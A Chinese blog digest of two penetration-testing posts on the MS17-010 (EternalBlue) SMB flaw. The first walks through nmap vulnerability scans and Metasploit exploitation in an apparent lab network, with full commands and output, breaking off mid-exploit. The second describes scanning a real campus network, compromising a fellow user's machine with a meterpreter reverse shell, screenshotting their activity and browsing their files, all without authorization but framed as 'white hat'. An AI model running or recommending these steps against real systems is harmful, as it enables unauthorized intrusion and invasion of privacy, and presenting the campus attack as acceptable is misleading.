本邮件内容由第三方提供,如果您不想继续收到该邮件,可 点此退订 。
渗透测试学习笔记之案例一 阅读原文» 0x00 前言
0x01 案列分析
0x00 前言
很久没有更新博客了,主要是因为工作很忙,写博客也太耗时间了。但是突然发现,许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章,也可以认为是学习笔记吧,留作日后的技术积累和参考吧。
0x01 案列分析
实验环境:
- 目标靶机:10.11.1.0/24
- 攻击机:Kali Linux (10.11.0.79)
信息收集:
扫描存在smb服务的主机:
# nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt # cat smb_service.txt | grep -i windows | cut -d" " -f2 10.11.1.5 10.11.1.31 10.11.1.49 10.11.1.50 10.11.1.73 10.11.1.128 10.11.1.145 10.11.1.202 10.11.1.218 10.11.1.220 10.11.1.223 10.11.1.227 10.11.1.229 10.11.1.230 # cat smb_service.txt | grep -i open | cut -d" " -f2 > smb_server_all.txt
扫描存在smb漏洞的主机:
# find / -name smb*vuln*.nse /usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse /usr/share/nmap/scripts/smb-vuln-ms06-025.nse /usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse /usr/share/nmap/scripts/smb-vuln-ms07-029.nse /usr/share/nmap/scripts/smb-vuln-ms17-010.nse /usr/share/nmap/scripts/smb-vuln-conficker.nse /usr/share/nmap/scripts/smb-vuln-ms08-067.nse /usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse /usr/share/nmap/scripts/smb-vuln-ms10-054.nse /usr/share/nmap/scripts/smb-vuln-ms10-061.nse # for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done # cat smb_vulns_smb-vuln-*.txt | grep IDs: | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143
漏洞利用:
检查并验证存在smb ms17-010漏洞的主机:
# cat ../scripts/smb_vulns_smb-vuln-ms17-010.nse.txt # Nmap 7.50 scan initiated Mon Jul 3 13:57:06 2017 as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt Nmap scan report for 10.11.1.5 Host is up (0.24s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:35:AF (VMware) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 ... ... Nmap scan report for 10.11.1.220 Host is up (0.24s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:15:14 (VMware) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 ... ... Nmap scan report for 10.11.1.230 Host is up (0.25s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:5C:19 (VMware) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Read data files from: /usr/bin/../share/nmap # Nmap done at Mon Jul 3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds
IP: 10.11.1.5 利用失败
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.5 RHOST => 10.11.1.5 msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.11.0.79:4444 [*] 10.11.1.5:445 - Connecting to target for exploitation. [+] 10.11.1.5:445 - Connection established for exploitation. [!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply [!] 10.11.1.5:445 - Disable VerifyTarget option to proceed manually... [-] 10.11.1.5:445 - Unable to continue with improper OS Target. [*] Exploit completed, but no session was created.
IP: 10.11.1.230 同样地,利用失败了
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.230 RHOST => 10.11.1.230 msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.11.0.79:4444 [*] 10.11.1.230:445 - Connecting to target for exploitation. [+] 10.11.1.230:445 - Connection established for exploitation. [+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes) [*] 10.11.1.230:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 10.11.1.230:445 - 0x00000010 74 65 20 4e 20 37 36 30 30 te N 7600 [!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply [!] 10.11.1.230:445 - Disable VerifyArch option to proceed manually... [-] 10.11.1.230:445 - Unable to continue with improper OS Arch. [*] Exploit completed, but no session was created.
IP: 10.11.1.220 成功利用并反弹了一个shell回来
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.220 RHOST => 10.11.1.220 msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.11.0.79:4444 [*] 10.11.1.220:445 - Connecting to target for exploitation. [+] 10.11.1.220:445 - Connection established for exploitation. [+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes) [*] 10.11.1.220:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.11.1.220:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 10.11.1.220:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 10.11.1.220:445 - 0x00000030 6b 20 31 k 1 [+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations. [*] 10.11.1.220:445 - Sending all but last fragment of exploit packet [*] 10.11.1.220:445 - Starting non-paged pool grooming [+] 10.11.1.220:445 - Sending SMBv2 buffers [+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵 阅读原文»*本文原创作者:TimeShatter,本文属FreeBuf原创奖励计划,未经许可禁止转载
利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口。最近在搞MSF的深入学习,于是有了下文。
ms17_010扫描工具
msf中的辅助模块含有一个强大的ms17_010扫描工具:
auxiliary/scanner/smb/smb_ms17_010使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单。
首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16。实际上经过测试,只需扫描10.31.0-128.1-254 就可以了。
具体的命令如下:
use auxiliary/scanner/smb/smb_ms17_010 set rhosts 10.31.0-128.1-254 set threads 512 exploit
扫描的部分结果如下图所示:
上图中,左侧有绿色加号标记的主机并且被识别出来是Windows 7的主机有很大概率存在该漏洞。如果被识别出是Windows 8 或者 Windows 10的主机,基本上是不能成功的。当尝试完Windows 7 的后,如果还没有一台可以入侵的,可以继续尝试那些左侧是红色减号并且没有识别出系统版本的。
好了,目标主机有了,下面就是开始入侵了!
利用ms17_010入侵主机
msf中的exploit模块中含有ms17_010的利用工具:
exploit/windows/smb/ms17_010_eternalblue该工具的使用也很简单,只要设置好目标主要的ip和payload就可以exploit了。
需要注意的是,在使用该exploit入侵主机时,如果一次不能成功,尽量不要尝试第二次了,这样很容易把目标主机搞崩溃。
具体的命令如下:
use exploit/windows/smb/ms17_010_eternalblue set rhost 10.31.36.66 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.31.30.49 set lport 4567 exploit以上命令中的10.31.36.66为目标主机,监听反连的主机ip为10.31.30.49,也就是自己的主机ip,监听的端口为4567端口。
不过上面那台主机并没有成功,下面是另外一台成功入侵的截图:
可以上面中的10.31.36.103 主机被成功入侵了:)。
然后输入screenshot截个图看看主人在干什么吧。
screenshot
好吧,在看LOL比赛 0.0 。
我还是简单看看机子上有没动作片好下载,然后上传个txt提醒他修复漏洞好了。我们都是有操守的白帽子对吧:)。
至此,利用MSF对ms17_010漏洞主机的发现和入侵过程就结束了,通过这些对校园网的扫描,发现还是有大部分主机是存在该漏洞的。。。
*本文原创作者:TimeShatter,本文属FreeBuf原创奖励计划,未经许可禁止转载
黑客技术官网地址:http://www.hackdig.com/
没有评论:
发表评论